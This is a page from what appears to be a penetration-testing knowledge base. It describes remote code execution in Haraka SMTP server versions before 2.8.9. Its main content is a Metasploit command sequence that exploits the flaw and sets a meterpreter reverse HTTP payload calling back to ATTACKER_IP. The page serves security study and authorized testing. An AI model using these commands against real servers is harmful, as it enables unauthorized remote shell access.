Skip to content

AMRAP Security

Haraka

AMRAP Security

Home
📱 Mobile Security
📱 Mobile Security
- Android
  Android
  - Frida Scripts
    Frida Scripts
    
    Overview
    
    Cryptography
    Cryptography
    
    Cryptography
    
    Random
    
    Data Storage
    Data Storage
    
    Log
    
    Print Stream
    
    Shared Preferences
    
    SQLite Database
    
    TextView
    
    Network
    Network
    
    HTTP Connection
    
    Read/Write Data
    
    SSL Pinning
    
    Platform Interaction
    Platform Interaction
    
    Permissions
  - Uncrackable L1
🕸️ Web Applications Security
🕸️ Web Applications Security
- Introduction
- Client Side Attacks
  Client Side Attacks
- Content Management Systems (CMS)
  Content Management Systems (CMS)
  - Introduction
  - WordPress
- Injection Attacks
  Injection Attacks
  - SQL Injection
- Tools
🌐 Network Security
🌐 Network Security
- Network Fundamentals
- Services And Protocols
  Services And Protocols
  - FTP
  - HTTP
  - MySQL
  - PostgreSQL
  - RDP
  - Rejetto HFS
  - SMB
  - SMTP
  - SNMP
  - SSH
  - WebDAV
  - WinRM
- Active Directory
- Information Gathering
  Information Gathering
- Exploitation
  Exploitation
  - Introduction
  - Remote Shells
  - Linux
    Linux
    
    Haraka
    
    libssh
    
    PHP CGI
    
    Samba
    
    Shellshock
    
    Tomcat
    
    vsftpd
- Windows
  Windows
- Post Exploitation
  Post Exploitation
  - Pivoting
  - Linux
    Linux
    
    Enumeration
    
    Privilege Escalation
    
    Persistence
    
    Hash Dumping
    
    Clearing Tracks
  - Windows
    Windows
    
    Overview
    
    Enumeration
    
    Privilege Escalation
    
    Persistence
    
    Hash Dumping
    
    Clearing Tracks
- Tools
  Tools
  - CrackMapExec
  - Empire
  - Metasploit
  - Mimikatz
  - Msfvenom
  - Nessus
  - Netcat
  - Nmap
  - Searchsploit
  - Socat
  - WMAP
⚡ Cheatsheets
⚡ Cheatsheets
- Network Security
- Web App Security

Haraka SMTP Server

Haraka is an open source SMTP server deployed in Node.js.

All Haraka versions prior to v2.8.9 are vulnerable to RCE.

Exploitation with Metasploit

use exploit/linux/smtp/haraka

set RHOST TARGET_IP

set SRVPORT 9898

set email_to EMAIL_VALUE

set payload linux/x64/meterpreter_reverse_http

set LHOST ATTACKER_IP

run